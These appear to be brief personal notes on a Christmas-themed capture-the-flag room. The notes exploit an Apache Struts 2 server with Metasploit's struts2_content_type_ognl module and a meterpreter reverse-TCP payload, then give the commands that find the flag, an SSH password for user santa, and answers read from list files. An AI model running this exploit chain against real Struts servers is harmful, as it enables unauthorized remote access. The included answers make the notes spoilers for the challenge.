Metrasploit and Struts2

nmap
22
80
111

Nmap reveals a web service running on port 80/tcp, identified as Apache Tomcat/Coyote JSP engine 1.1. When we connect to the web server, we are redirected to /showcase.action.

Googling for the terms "apache" and "showcase.action" confirms that the server is probably running "Struts 2"

search struts2
use 0 but not worked
use exploit/multi/http/struts2_content_type_ognl
set rhosts
set rport
set lhost
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
got meterpreter

to run find command use---> shell
find / 2>/dev/null -i flag  [-i ignor case]
/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt

ssh      -via /home/santa
santa:rudolphrednosedreindeer

Task

• Compromise the web server using Metasploit. What is flag1?

  [redacted challenge flag]
  

• Now you’ve compromised the web server, get onto the main system. What is Santa’s SSH password?

  [redacted sensitive answer]
  

• Who is on line 148 of the naughty list?

  Melisa Vanhoose      --via sed -n 148p ./< naughty list >
  

• Who is on line 52 of the nice list?

  Lindsey Gaffney      --via sed -n 52p ./< nice list >